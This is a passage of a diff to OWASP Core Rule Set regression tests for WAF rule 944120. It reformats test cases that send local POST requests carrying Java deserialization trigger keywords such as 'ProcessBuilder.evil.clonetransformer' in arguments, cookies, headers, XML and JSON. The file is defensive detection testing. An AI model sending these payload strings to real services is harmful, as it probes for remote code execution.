"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 6 desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-15 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-16 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-17 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-18 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + 